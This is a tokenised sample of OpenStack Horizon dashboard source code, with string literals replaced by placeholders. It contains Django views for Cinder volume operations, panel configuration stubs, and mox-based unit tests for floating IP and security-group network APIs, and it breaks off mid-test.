<EOL> ] </s>
<s> """<STR_LIT>""" <EOL> import json <EOL> from django . core . urlresolvers import reverse <EOL> from django . core . urlresolvers import reverse_lazy <EOL> from django . utils import encoding <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from django . views import generic <EOL> from horizon import exceptions <EOL> from horizon import forms <EOL> from horizon import tables <EOL> from horizon import tabs <EOL> from horizon . utils import memoized <EOL> from openstack_dashboard import api <EOL> from openstack_dashboard . api import cinder <EOL> from openstack_dashboard import exceptions as dashboard_exception <EOL> from openstack_dashboard . usage import quotas <EOL> from openstack_dashboard . utils import filters <EOL> from openstack_dashboard . dashboards . project . volumes . volumes import forms as project_forms <EOL> from openstack_dashboard . dashboards . project . volumes . volumes import tables as project_tables <EOL> from openstack_dashboard . dashboards . project . volumes . volumes import tabs as project_tabs <EOL> class DetailView ( tabs . TabView ) : <EOL> tab_group_class = project_tabs . VolumeDetailTabs <EOL> template_name = '<STR_LIT>' <EOL> page_title = "<STR_LIT>" <EOL> def get_context_data ( self , ** kwargs ) : <EOL> context = super ( DetailView , self ) . get_context_data ( ** kwargs ) <EOL> volume = self . get_data ( ) <EOL> table = project_tables . VolumesTable ( self . request ) <EOL> context [ "<STR_LIT>" ] = volume <EOL> context [ "<STR_LIT:url>" ] = self . get_redirect_url ( ) <EOL> context [ "<STR_LIT>" ] = table . render_row_actions ( volume ) <EOL> choices = project_tables . VolumesTableBase . STATUS_DISPLAY_CHOICES <EOL> volume . status_label = filters . get_display_label ( choices , volume . status ) <EOL> return context <EOL> @ memoized . memoized_method <EOL> def get_data ( self ) : <EOL> try : <EOL> volume_id = self . kwargs [ '<STR_LIT>' ] <EOL> volume = cinder . volume_get ( self . 
request , volume_id ) <EOL> snapshots = cinder . volume_snapshot_list ( <EOL> self . request , search_opts = { '<STR_LIT>' : volume . id } ) <EOL> if snapshots : <EOL> setattr ( volume , '<STR_LIT>' , True ) <EOL> for att in volume . attachments : <EOL> att [ '<STR_LIT>' ] = api . nova . server_get ( self . request , <EOL> att [ '<STR_LIT>' ] ) <EOL> except Exception : <EOL> redirect = self . get_redirect_url ( ) <EOL> exceptions . handle ( self . request , <EOL> _ ( '<STR_LIT>' ) , <EOL> redirect = redirect ) <EOL> return volume <EOL> def get_redirect_url ( self ) : <EOL> return reverse ( '<STR_LIT>' ) <EOL> def get_tabs ( self , request , * args , ** kwargs ) : <EOL> volume = self . get_data ( ) <EOL> return self . tab_group_class ( request , volume = volume , ** kwargs ) <EOL> class CreateView ( forms . ModalFormView ) : <EOL> form_class = project_forms . CreateForm <EOL> modal_header = _ ( "<STR_LIT>" ) <EOL> template_name = '<STR_LIT>' <EOL> submit_label = _ ( "<STR_LIT>" ) <EOL> submit_url = reverse_lazy ( "<STR_LIT>" ) <EOL> success_url = reverse_lazy ( '<STR_LIT>' ) <EOL> page_title = _ ( "<STR_LIT>" ) <EOL> def get_initial ( self ) : <EOL> initial = super ( CreateView , self ) . get_initial ( ) <EOL> self . default_vol_type = None <EOL> try : <EOL> self . default_vol_type = cinder . volume_type_default ( self . request ) <EOL> initial [ '<STR_LIT:type>' ] = self . default_vol_type . name <EOL> except dashboard_exception . NOT_FOUND : <EOL> pass <EOL> return initial <EOL> def get_context_data ( self , ** kwargs ) : <EOL> context = super ( CreateView , self ) . get_context_data ( ** kwargs ) <EOL> try : <EOL> context [ '<STR_LIT>' ] = quotas . tenant_limit_usages ( self . request ) <EOL> context [ '<STR_LIT>' ] = self . _get_volume_types ( ) <EOL> except Exception : <EOL> exceptions . handle ( self . request ) <EOL> return context <EOL> def _get_volume_types ( self ) : <EOL> try : <EOL> volume_types = cinder . volume_type_list ( self . 
request ) <EOL> except Exception : <EOL> exceptions . handle ( self . request , <EOL> _ ( '<STR_LIT>' ) ) <EOL> no_type_description = None <EOL> if self . default_vol_type is None : <EOL> message = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> no_type_description = encoding . force_text ( message ) <EOL> type_descriptions = [ { '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT:description>' : no_type_description } ] + [ { '<STR_LIT:name>' : type . name , <EOL> '<STR_LIT:description>' : getattr ( type , "<STR_LIT:description>" , "<STR_LIT>" ) } <EOL> for type in volume_types ] <EOL> return json . dumps ( type_descriptions ) <EOL> class ExtendView ( forms . ModalFormView ) : <EOL> form_class = project_forms . ExtendForm <EOL> modal_header = _ ( "<STR_LIT>" ) <EOL> template_name = '<STR_LIT>' <EOL> submit_label = _ ( "<STR_LIT>" ) <EOL> submit_url = "<STR_LIT>" <EOL> success_url = reverse_lazy ( "<STR_LIT>" ) <EOL> page_title = _ ( "<STR_LIT>" ) <EOL> def get_object ( self ) : <EOL> if not hasattr ( self , "<STR_LIT>" ) : <EOL> volume_id = self . kwargs [ '<STR_LIT>' ] <EOL> try : <EOL> self . _object = cinder . volume_get ( self . request , volume_id ) <EOL> except Exception : <EOL> self . _object = None <EOL> exceptions . handle ( self . request , <EOL> _ ( '<STR_LIT>' ) ) <EOL> return self . _object <EOL> def get_context_data ( self , ** kwargs ) : <EOL> context = super ( ExtendView , self ) . get_context_data ( ** kwargs ) <EOL> context [ '<STR_LIT>' ] = self . get_object ( ) <EOL> args = ( self . kwargs [ '<STR_LIT>' ] , ) <EOL> context [ '<STR_LIT>' ] = reverse ( self . submit_url , args = args ) <EOL> try : <EOL> usages = quotas . tenant_limit_usages ( self . request ) <EOL> usages [ '<STR_LIT>' ] = ( usages [ '<STR_LIT>' ] <EOL> - context [ '<STR_LIT>' ] . size ) <EOL> context [ '<STR_LIT>' ] = usages <EOL> except Exception : <EOL> exceptions . handle ( self . request ) <EOL> return context <EOL> def get_initial ( self ) : <EOL> volume = self . 
get_object ( ) <EOL> return { '<STR_LIT:id>' : self . kwargs [ '<STR_LIT>' ] , <EOL> '<STR_LIT:name>' : volume . name , <EOL> '<STR_LIT>' : volume . size } <EOL> class CreateSnapshotView ( forms . ModalFormView ) : <EOL> form_class = project_forms . CreateSnapshotForm <EOL> modal_header = _ ( "<STR_LIT>" ) <EOL> template_name = '<STR_LIT>' <EOL> submit_url = "<STR_LIT>" <EOL> success_url = reverse_lazy ( '<STR_LIT>' ) <EOL> page_title = _ ( "<STR_LIT>" ) <EOL> def get_context_data ( self , ** kwargs ) : <EOL> context = super ( CreateSnapshotView , self ) . get_context_data ( ** kwargs ) <EOL> context [ '<STR_LIT>' ] = self . kwargs [ '<STR_LIT>' ] <EOL> args = ( self . kwargs [ '<STR_LIT>' ] , ) <EOL> context [ '<STR_LIT>' ] = reverse ( self . submit_url , args = args ) <EOL> try : <EOL> volume = cinder . volume_get ( self . request , context [ '<STR_LIT>' ] ) <EOL> if ( volume . status == '<STR_LIT>' ) : <EOL> context [ '<STR_LIT>' ] = True <EOL> context [ '<STR_LIT>' ] . set_warning ( _ ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) ) <EOL> context [ '<STR_LIT>' ] = quotas . tenant_limit_usages ( self . request ) <EOL> except Exception : <EOL> exceptions . handle ( self . request , <EOL> _ ( '<STR_LIT>' ) ) <EOL> return context <EOL> def get_initial ( self ) : <EOL> return { '<STR_LIT>' : self . kwargs [ "<STR_LIT>" ] } <EOL> class UploadToImageView ( forms . ModalFormView ) : <EOL> form_class = project_forms . UploadToImageForm <EOL> modal_header = _ ( "<STR_LIT>" ) <EOL> template_name = '<STR_LIT>' <EOL> submit_label = _ ( "<STR_LIT>" ) <EOL> submit_url = "<STR_LIT>" <EOL> success_url = reverse_lazy ( "<STR_LIT>" ) <EOL> page_title = _ ( "<STR_LIT>" ) <EOL> @ memoized . memoized_method <EOL> def get_data ( self ) : <EOL> try : <EOL> volume_id = self . kwargs [ '<STR_LIT>' ] <EOL> volume = cinder . volume_get ( self . 
request , volume_id ) <EOL> except Exception : <EOL> error_message = _ ( <EOL> '<STR_LIT>' ) % volume_id <EOL> exceptions . handle ( self . request , <EOL> error_message , <EOL> redirect = self . success_url ) <EOL> return volume <EOL> def get_context_data ( self , ** kwargs ) : <EOL> context = super ( UploadToImageView , self ) . get_context_data ( ** kwargs ) <EOL> context [ '<STR_LIT>' ] = self . get_data ( ) <EOL> args = ( self . kwargs [ '<STR_LIT>' ] , ) <EOL> context [ '<STR_LIT>' ] = reverse ( self . submit_url , args = args ) <EOL> return context <EOL> def get_initial ( self ) : <EOL> volume = self . get_data ( ) <EOL> return { '<STR_LIT:id>' : self . kwargs [ '<STR_LIT>' ] , <EOL> '<STR_LIT:name>' : volume . name , <EOL> '<STR_LIT:status>' : volume . status } <EOL> class CreateTransferView ( forms . ModalFormView ) : <EOL> form_class = project_forms . CreateTransferForm <EOL> template_name = '<STR_LIT>' <EOL> success_url = reverse_lazy ( '<STR_LIT>' ) <EOL> modal_id = "<STR_LIT>" <EOL> modal_header = _ ( "<STR_LIT>" ) <EOL> submit_label = _ ( "<STR_LIT>" ) <EOL> submit_url = "<STR_LIT>" <EOL> page_title = _ ( "<STR_LIT>" ) <EOL> def get_context_data ( self , * args , ** kwargs ) : <EOL> context = super ( CreateTransferView , self ) . get_context_data ( ** kwargs ) <EOL> volume_id = self . kwargs [ '<STR_LIT>' ] <EOL> context [ '<STR_LIT>' ] = volume_id <EOL> context [ '<STR_LIT>' ] = reverse ( self . submit_url , args = [ volume_id ] ) <EOL> return context <EOL> def get_initial ( self ) : <EOL> return { '<STR_LIT>' : self . kwargs [ "<STR_LIT>" ] } <EOL> class AcceptTransferView ( forms . ModalFormView ) : <EOL> form_class = project_forms . 
AcceptTransferForm <EOL> template_name = '<STR_LIT>' <EOL> success_url = reverse_lazy ( '<STR_LIT>' ) <EOL> modal_id = "<STR_LIT>" <EOL> modal_header = _ ( "<STR_LIT>" ) <EOL> submit_label = _ ( "<STR_LIT>" ) <EOL> submit_url = reverse_lazy ( <EOL> "<STR_LIT>" ) <EOL> page_title = _ ( "<STR_LIT>" ) <EOL> class ShowTransferView ( forms . ModalFormView ) : <EOL> form_class = project_forms . ShowTransferForm <EOL> template_name = '<STR_LIT>' <EOL> success_url = reverse_lazy ( '<STR_LIT>' ) <EOL> modal_id = "<STR_LIT>" <EOL> modal_header = _ ( "<STR_LIT>" ) <EOL> submit_url = "<STR_LIT>" <EOL> cancel_label = _ ( "<STR_LIT>" ) <EOL> page_title = _ ( "<STR_LIT>" ) <EOL> def get_object ( self ) : <EOL> try : <EOL> return self . _object <EOL> except AttributeError : <EOL> transfer_id = self . kwargs [ '<STR_LIT>' ] <EOL> try : <EOL> self . _object = cinder . transfer_get ( self . request , transfer_id ) <EOL> return self . _object <EOL> except Exception : <EOL> exceptions . handle ( self . request , <EOL> _ ( '<STR_LIT>' ) ) <EOL> def get_context_data ( self , ** kwargs ) : <EOL> context = super ( ShowTransferView , self ) . get_context_data ( ** kwargs ) <EOL> context [ '<STR_LIT>' ] = self . kwargs [ '<STR_LIT>' ] <EOL> context [ '<STR_LIT>' ] = self . kwargs [ '<STR_LIT>' ] <EOL> context [ '<STR_LIT>' ] = reverse ( self . submit_url , args = [ <EOL> context [ '<STR_LIT>' ] , context [ '<STR_LIT>' ] ] ) <EOL> return context <EOL> def get_initial ( self ) : <EOL> transfer = self . get_object ( ) <EOL> return { '<STR_LIT:id>' : transfer . id , <EOL> '<STR_LIT:name>' : transfer . name , <EOL> '<STR_LIT>' : self . kwargs [ '<STR_LIT>' ] } <EOL> class UpdateView ( forms . ModalFormView ) : <EOL> form_class = project_forms . 
UpdateForm <EOL> modal_header = _ ( "<STR_LIT>" ) <EOL> modal_id = "<STR_LIT>" <EOL> template_name = '<STR_LIT>' <EOL> submit_url = "<STR_LIT>" <EOL> success_url = reverse_lazy ( "<STR_LIT>" ) <EOL> page_title = _ ( "<STR_LIT>" ) <EOL> def get_object ( self ) : <EOL> if not hasattr ( self , "<STR_LIT>" ) : <EOL> vol_id = self . kwargs [ '<STR_LIT>' ] <EOL> try : <EOL> self . _object = cinder . volume_get ( self . request , vol_id ) <EOL> except Exception : <EOL> msg = _ ( '<STR_LIT>' ) <EOL> url = reverse ( '<STR_LIT>' ) <EOL> exceptions . handle ( self . request , msg , redirect = url ) <EOL> return self . _object <EOL> def get_context_data ( self , ** kwargs ) : <EOL> context = super ( UpdateView , self ) . get_context_data ( ** kwargs ) <EOL> context [ '<STR_LIT>' ] = self . get_object ( ) <EOL> args = ( self . kwargs [ '<STR_LIT>' ] , ) <EOL> context [ '<STR_LIT>' ] = reverse ( self . submit_url , args = args ) <EOL> return context <EOL> def get_initial ( self ) : <EOL> volume = self . get_object ( ) <EOL> return { '<STR_LIT>' : self . kwargs [ "<STR_LIT>" ] , <EOL> '<STR_LIT:name>' : volume . name , <EOL> '<STR_LIT:description>' : volume . description , <EOL> '<STR_LIT>' : volume . is_bootable } <EOL> class EditAttachmentsView ( tables . DataTableView , forms . ModalFormView ) : <EOL> table_class = project_tables . AttachmentsTable <EOL> form_class = project_forms . AttachForm <EOL> form_id = "<STR_LIT>" <EOL> modal_header = _ ( "<STR_LIT>" ) <EOL> modal_id = "<STR_LIT>" <EOL> template_name = '<STR_LIT>' <EOL> submit_url = "<STR_LIT>" <EOL> success_url = reverse_lazy ( "<STR_LIT>" ) <EOL> page_title = _ ( "<STR_LIT>" ) <EOL> @ memoized . memoized_method <EOL> def get_object ( self ) : <EOL> volume_id = self . kwargs [ '<STR_LIT>' ] <EOL> try : <EOL> return cinder . volume_get ( self . request , volume_id ) <EOL> except Exception : <EOL> self . _object = None <EOL> exceptions . handle ( self . 
request , <EOL> _ ( '<STR_LIT>' ) ) <EOL> def get_data ( self ) : <EOL> attachments = [ ] <EOL> volume = self . get_object ( ) <EOL> if volume is not None : <EOL> for att in volume . attachments : <EOL> att [ '<STR_LIT>' ] = getattr ( volume , '<STR_LIT:name>' , att [ '<STR_LIT>' ] ) <EOL> attachments . append ( att ) <EOL> return attachments <EOL> def get_initial ( self ) : <EOL> try : <EOL> instances , has_more = api . nova . server_list ( self . request ) <EOL> except Exception : <EOL> instances = [ ] <EOL> exceptions . handle ( self . request , <EOL> _ ( "<STR_LIT>" ) ) <EOL> return { '<STR_LIT>' : self . get_object ( ) , <EOL> '<STR_LIT>' : instances } <EOL> @ memoized . memoized_method <EOL> def get_form ( self , ** kwargs ) : <EOL> form_class = kwargs . get ( '<STR_LIT>' , self . get_form_class ( ) ) <EOL> return super ( EditAttachmentsView , self ) . get_form ( form_class ) <EOL> def get_context_data ( self , ** kwargs ) : <EOL> context = super ( EditAttachmentsView , self ) . get_context_data ( ** kwargs ) <EOL> context [ '<STR_LIT>' ] = self . get_form ( ) <EOL> volume = self . get_object ( ) <EOL> args = ( self . kwargs [ '<STR_LIT>' ] , ) <EOL> context [ '<STR_LIT>' ] = reverse ( self . submit_url , args = args ) <EOL> if volume and volume . status == '<STR_LIT>' : <EOL> context [ '<STR_LIT>' ] = True <EOL> else : <EOL> context [ '<STR_LIT>' ] = False <EOL> context [ '<STR_LIT>' ] = volume <EOL> if self . request . is_ajax ( ) : <EOL> context [ '<STR_LIT>' ] = True <EOL> return context <EOL> def get ( self , request , * args , ** kwargs ) : <EOL> handled = self . construct_tables ( ) <EOL> if handled : <EOL> return handled <EOL> return self . render_to_response ( self . get_context_data ( ** kwargs ) ) <EOL> def post ( self , request , * args , ** kwargs ) : <EOL> form = self . get_form ( ) <EOL> if form . is_valid ( ) : <EOL> return self . form_valid ( form ) <EOL> else : <EOL> return self . 
get ( request , * args , ** kwargs ) <EOL> class RetypeView ( forms . ModalFormView ) : <EOL> form_class = project_forms . RetypeForm <EOL> modal_id = "<STR_LIT>" <EOL> modal_header = _ ( "<STR_LIT>" ) <EOL> template_name = '<STR_LIT>' <EOL> submit_label = _ ( "<STR_LIT>" ) <EOL> submit_url = "<STR_LIT>" <EOL> success_url = reverse_lazy ( "<STR_LIT>" ) <EOL> page_title = _ ( "<STR_LIT>" ) <EOL> @ memoized . memoized_method <EOL> def get_data ( self ) : <EOL> try : <EOL> volume_id = self . kwargs [ '<STR_LIT>' ] <EOL> volume = cinder . volume_get ( self . request , volume_id ) <EOL> except Exception : <EOL> error_message = _ ( <EOL> '<STR_LIT>' ) % volume_id <EOL> exceptions . handle ( self . request , <EOL> error_message , <EOL> redirect = self . success_url ) <EOL> return volume <EOL> def get_context_data ( self , ** kwargs ) : <EOL> context = super ( RetypeView , self ) . get_context_data ( ** kwargs ) <EOL> context [ '<STR_LIT>' ] = self . get_data ( ) <EOL> args = ( self . kwargs [ '<STR_LIT>' ] , ) <EOL> context [ '<STR_LIT>' ] = reverse ( self . submit_url , args = args ) <EOL> return context <EOL> def get_initial ( self ) : <EOL> volume = self . get_data ( ) <EOL> return { '<STR_LIT:id>' : self . kwargs [ '<STR_LIT>' ] , <EOL> '<STR_LIT:name>' : volume . name , <EOL> '<STR_LIT>' : volume . volume_type } <EOL> class EncryptionDetailView ( generic . TemplateView ) : <EOL> template_name = '<STR_LIT>' <EOL> page_title = _ ( "<STR_LIT>" ) <EOL> def get_context_data ( self , ** kwargs ) : <EOL> context = super ( EncryptionDetailView , self ) . get_context_data ( ** kwargs ) <EOL> volume = self . get_volume_data ( ) <EOL> context [ "<STR_LIT>" ] = self . get_encryption_data ( ) <EOL> context [ "<STR_LIT>" ] = volume <EOL> context [ "<STR_LIT>" ] = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) % { '<STR_LIT>' : <EOL> volume . name } <EOL> return context <EOL> @ memoized . memoized_method <EOL> def get_encryption_data ( self ) : <EOL> try : <EOL> volume_id = self . 
kwargs [ '<STR_LIT>' ] <EOL> self . _encryption_metadata = cinder . volume_get_encryption_metadata ( self . request , <EOL> volume_id ) <EOL> except Exception : <EOL> redirect = self . get_redirect_url ( ) <EOL> exceptions . handle ( self . request , <EOL> _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> redirect = redirect ) <EOL> return self . _encryption_metadata <EOL> @ memoized . memoized_method <EOL> def get_volume_data ( self ) : <EOL> try : <EOL> volume_id = self . kwargs [ '<STR_LIT>' ] <EOL> volume = cinder . volume_get ( self . request , volume_id ) <EOL> except Exception : <EOL> redirect = self . get_redirect_url ( ) <EOL> exceptions . handle ( self . request , <EOL> _ ( '<STR_LIT>' ) , <EOL> redirect = redirect ) <EOL> return volume <EOL> def get_redirect_url ( self ) : <EOL> return reverse ( '<STR_LIT>' ) </s>
<s> PANEL = '<STR_LIT>' <EOL> PANEL_DASHBOARD = '<STR_LIT>' <EOL> PANEL_GROUP = '<STR_LIT>' <EOL> ADD_PANEL = '<STR_LIT>' </s>
<s> PANEL = '<STR_LIT>' <EOL> PANEL_DASHBOARD = '<STR_LIT>' <EOL> PANEL_GROUP = '<STR_LIT:default>' <EOL> ADD_PANEL = '<STR_LIT>' </s>
<s> import collections <EOL> import copy <EOL> import uuid <EOL> from django import http <EOL> from django . test . utils import override_settings <EOL> from mox3 . mox import IsA <EOL> import six <EOL> from novaclient . v2 import floating_ip_pools <EOL> from openstack_dashboard import api <EOL> from openstack_dashboard . test import helpers as test <EOL> class NetworkClientTestCase ( test . APITestCase ) : <EOL> def test_networkclient_no_neutron ( self ) : <EOL> self . mox . StubOutWithMock ( api . base , '<STR_LIT>' ) <EOL> api . base . is_service_enabled ( IsA ( http . HttpRequest ) , '<STR_LIT>' ) . AndReturn ( False ) <EOL> self . mox . ReplayAll ( ) <EOL> nc = api . network . NetworkClient ( self . request ) <EOL> self . assertIsInstance ( nc . floating_ips , api . nova . FloatingIpManager ) <EOL> self . assertIsInstance ( nc . secgroups , api . nova . SecurityGroupManager ) <EOL> def test_networkclient_neutron ( self ) : <EOL> self . mox . StubOutWithMock ( api . base , '<STR_LIT>' ) <EOL> api . base . is_service_enabled ( IsA ( http . HttpRequest ) , '<STR_LIT>' ) . AndReturn ( True ) <EOL> self . neutronclient = self . stub_neutronclient ( ) <EOL> self . neutronclient . list_extensions ( ) . AndReturn ( { '<STR_LIT>' : self . api_extensions . list ( ) } ) <EOL> self . mox . ReplayAll ( ) <EOL> nc = api . network . NetworkClient ( self . request ) <EOL> self . assertIsInstance ( nc . floating_ips , api . neutron . FloatingIpManager ) <EOL> self . assertIsInstance ( nc . secgroups , api . neutron . SecurityGroupManager ) <EOL> def test_networkclient_neutron_with_nova_security_group ( self ) : <EOL> self . mox . StubOutWithMock ( api . base , '<STR_LIT>' ) <EOL> api . base . is_service_enabled ( IsA ( http . HttpRequest ) , '<STR_LIT>' ) . AndReturn ( True ) <EOL> self . neutronclient = self . stub_neutronclient ( ) <EOL> self . neutronclient . list_extensions ( ) . AndReturn ( { '<STR_LIT>' : [ ] } ) <EOL> self . mox . ReplayAll ( ) <EOL> nc = api . 
network . NetworkClient ( self . request ) <EOL> self . assertIsInstance ( nc . floating_ips , api . neutron . FloatingIpManager ) <EOL> self . assertIsInstance ( nc . secgroups , api . nova . SecurityGroupManager ) <EOL> class NetworkApiNovaTestBase ( test . APITestCase ) : <EOL> def setUp ( self ) : <EOL> super ( NetworkApiNovaTestBase , self ) . setUp ( ) <EOL> self . mox . StubOutWithMock ( api . base , '<STR_LIT>' ) <EOL> api . base . is_service_enabled ( IsA ( http . HttpRequest ) , '<STR_LIT>' ) . AndReturn ( False ) <EOL> class NetworkApiNovaSecurityGroupTests ( NetworkApiNovaTestBase ) : <EOL> def test_server_update_security_groups ( self ) : <EOL> all_secgroups = self . security_groups . list ( ) <EOL> added_secgroup = all_secgroups [ <NUM_LIT:2> ] <EOL> rm_secgroup = all_secgroups [ <NUM_LIT:0> ] <EOL> cur_secgroups_raw = [ { '<STR_LIT:id>' : sg . id , '<STR_LIT:name>' : sg . name , <EOL> '<STR_LIT>' : [ ] } <EOL> for sg in all_secgroups [ <NUM_LIT:0> : <NUM_LIT:2> ] ] <EOL> cur_secgroups_ret = { '<STR_LIT>' : cur_secgroups_raw } <EOL> new_sg_ids = [ sg . id for sg in all_secgroups [ <NUM_LIT:1> : <NUM_LIT:3> ] ] <EOL> instance_id = self . servers . first ( ) . id <EOL> novaclient = self . stub_novaclient ( ) <EOL> novaclient . security_groups = self . mox . CreateMockAnything ( ) <EOL> novaclient . servers = self . mox . CreateMockAnything ( ) <EOL> novaclient . client = self . mox . CreateMockAnything ( ) <EOL> novaclient . security_groups . list ( ) . AndReturn ( all_secgroups ) <EOL> url = '<STR_LIT>' % instance_id <EOL> novaclient . client . get ( url ) . AndReturn ( ( <NUM_LIT:200> , cur_secgroups_ret ) ) <EOL> novaclient . servers . add_security_group ( instance_id , added_secgroup . name ) <EOL> novaclient . servers . remove_security_group ( instance_id , rm_secgroup . name ) <EOL> self . mox . ReplayAll ( ) <EOL> api . network . server_update_security_groups ( <EOL> self . 
request , instance_id , new_sg_ids ) <EOL> class NetworkApiNovaFloatingIpTests ( NetworkApiNovaTestBase ) : <EOL> def test_floating_ip_pools_list ( self ) : <EOL> pool_names = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> pools = [ floating_ip_pools . FloatingIPPool ( <EOL> None , { '<STR_LIT:name>' : pool } ) for pool in pool_names ] <EOL> novaclient = self . stub_novaclient ( ) <EOL> novaclient . floating_ip_pools = self . mox . CreateMockAnything ( ) <EOL> novaclient . floating_ip_pools . list ( ) . AndReturn ( pools ) <EOL> self . mox . ReplayAll ( ) <EOL> ret = api . network . floating_ip_pools_list ( self . request ) <EOL> self . assertEqual ( pool_names , [ p . name for p in ret ] ) <EOL> def test_floating_ip_list ( self ) : <EOL> fips = self . api_floating_ips . list ( ) <EOL> novaclient = self . stub_novaclient ( ) <EOL> novaclient . floating_ips = self . mox . CreateMockAnything ( ) <EOL> novaclient . floating_ips . list ( ) . AndReturn ( fips ) <EOL> self . mox . ReplayAll ( ) <EOL> ret = api . network . tenant_floating_ip_list ( self . request ) <EOL> for r , e in zip ( ret , fips ) : <EOL> for attr in [ '<STR_LIT:id>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> self . assertEqual ( getattr ( e , attr ) , getattr ( r , attr ) ) <EOL> self . assertEqual ( e . instance_id , r . port_id ) <EOL> exp_instance_type = '<STR_LIT>' if e . instance_id else None <EOL> self . assertEqual ( exp_instance_type , r . instance_type ) <EOL> def test_floating_ip_get ( self ) : <EOL> fip = self . api_floating_ips . first ( ) <EOL> novaclient = self . stub_novaclient ( ) <EOL> novaclient . floating_ips = self . mox . CreateMockAnything ( ) <EOL> novaclient . floating_ips . get ( fip . id ) . AndReturn ( fip ) <EOL> self . mox . ReplayAll ( ) <EOL> ret = api . network . tenant_floating_ip_get ( self . request , fip . id ) <EOL> for attr in [ '<STR_LIT:id>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> self . 
assertEqual ( getattr ( fip , attr ) , getattr ( ret , attr ) ) <EOL> self . assertEqual ( fip . instance_id , ret . port_id ) <EOL> self . assertEqual ( fip . instance_id , ret . instance_id ) <EOL> self . assertEqual ( '<STR_LIT>' , ret . instance_type ) <EOL> def test_floating_ip_allocate ( self ) : <EOL> pool_name = '<STR_LIT>' <EOL> fip = [ fip for fip in self . api_floating_ips . list ( ) <EOL> if not fip . instance_id ] [ <NUM_LIT:0> ] <EOL> novaclient = self . stub_novaclient ( ) <EOL> novaclient . floating_ips = self . mox . CreateMockAnything ( ) <EOL> novaclient . floating_ips . create ( pool = pool_name ) . AndReturn ( fip ) <EOL> self . mox . ReplayAll ( ) <EOL> ret = api . network . tenant_floating_ip_allocate ( self . request , pool_name ) <EOL> for attr in [ '<STR_LIT:id>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> self . assertEqual ( getattr ( fip , attr ) , getattr ( ret , attr ) ) <EOL> self . assertIsNone ( ret . port_id ) <EOL> self . assertIsNone ( ret . instance_type ) <EOL> def test_floating_ip_release ( self ) : <EOL> fip = self . api_floating_ips . first ( ) <EOL> novaclient = self . stub_novaclient ( ) <EOL> novaclient . floating_ips = self . mox . CreateMockAnything ( ) <EOL> novaclient . floating_ips . delete ( fip . id ) <EOL> self . mox . ReplayAll ( ) <EOL> api . network . tenant_floating_ip_release ( self . request , fip . id ) <EOL> def test_floating_ip_associate ( self ) : <EOL> server = api . nova . Server ( self . servers . first ( ) , self . request ) <EOL> floating_ip = self . floating_ips . first ( ) <EOL> novaclient = self . stub_novaclient ( ) <EOL> novaclient . floating_ips = self . mox . CreateMockAnything ( ) <EOL> novaclient . servers = self . mox . CreateMockAnything ( ) <EOL> novaclient . servers . get ( server . id ) . AndReturn ( server ) <EOL> novaclient . floating_ips . get ( floating_ip . id ) . AndReturn ( floating_ip ) <EOL> novaclient . servers . add_floating_ip ( server . 
id , floating_ip . ip ) . AndReturn ( server ) <EOL> self . mox . ReplayAll ( ) <EOL> api . network . floating_ip_associate ( self . request , <EOL> floating_ip . id , <EOL> server . id ) <EOL> def test_floating_ip_disassociate ( self ) : <EOL> server = api . nova . Server ( self . servers . first ( ) , self . request ) <EOL> floating_ip = self . api_floating_ips . first ( ) <EOL> novaclient = self . stub_novaclient ( ) <EOL> novaclient . servers = self . mox . CreateMockAnything ( ) <EOL> novaclient . floating_ips = self . mox . CreateMockAnything ( ) <EOL> novaclient . servers . get ( server . id ) . AndReturn ( server ) <EOL> novaclient . floating_ips . get ( floating_ip . id ) . AndReturn ( floating_ip ) <EOL> novaclient . servers . remove_floating_ip ( server . id , floating_ip . ip ) . AndReturn ( server ) <EOL> self . mox . ReplayAll ( ) <EOL> api . network . floating_ip_disassociate ( self . request , <EOL> floating_ip . id ) <EOL> def test_floating_ip_target_list ( self ) : <EOL> servers = self . servers . list ( ) <EOL> novaclient = self . stub_novaclient ( ) <EOL> novaclient . servers = self . mox . CreateMockAnything ( ) <EOL> novaclient . servers . list ( ) . AndReturn ( servers ) <EOL> self . mox . ReplayAll ( ) <EOL> targets = api . network . floating_ip_target_list ( self . request ) <EOL> for target , server in zip ( targets , servers ) : <EOL> self . assertEqual ( server . id , target . id ) <EOL> self . assertEqual ( '<STR_LIT>' % ( server . name , server . id ) , target . name ) <EOL> def test_floating_ip_target_get_by_instance ( self ) : <EOL> self . mox . ReplayAll ( ) <EOL> instance_id = self . servers . first ( ) . id <EOL> ret = api . network . floating_ip_target_get_by_instance ( self . request , <EOL> instance_id ) <EOL> self . assertEqual ( instance_id , ret ) <EOL> class NetworkApiNeutronTestBase ( test . APITestCase ) : <EOL> def setUp ( self ) : <EOL> super ( NetworkApiNeutronTestBase , self ) . setUp ( ) <EOL> self . mox . 
StubOutWithMock ( api . base , '<STR_LIT>' ) <EOL> api . base . is_service_enabled ( IsA ( http . HttpRequest ) , '<STR_LIT>' ) . AndReturn ( True ) <EOL> self . qclient = self . stub_neutronclient ( ) <EOL> class NetworkApiNeutronTests ( NetworkApiNeutronTestBase ) : <EOL> def _get_expected_addresses ( self , server , no_fip_expected = True ) : <EOL> server_ports = self . ports . filter ( device_id = server . id ) <EOL> addresses = collections . defaultdict ( list ) <EOL> for p in server_ports : <EOL> net_name = self . networks . get ( id = p [ '<STR_LIT>' ] ) . name <EOL> for ip in p . fixed_ips : <EOL> addresses [ net_name ] . append ( <EOL> { '<STR_LIT:version>' : <NUM_LIT:4> , <EOL> '<STR_LIT>' : ip [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : p . mac_address , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> if no_fip_expected : <EOL> continue <EOL> fips = self . q_floating_ips . filter ( port_id = p [ '<STR_LIT:id>' ] ) <EOL> if not fips : <EOL> continue <EOL> fip = fips [ <NUM_LIT:0> ] <EOL> addresses [ net_name ] . append ( <EOL> { '<STR_LIT:version>' : 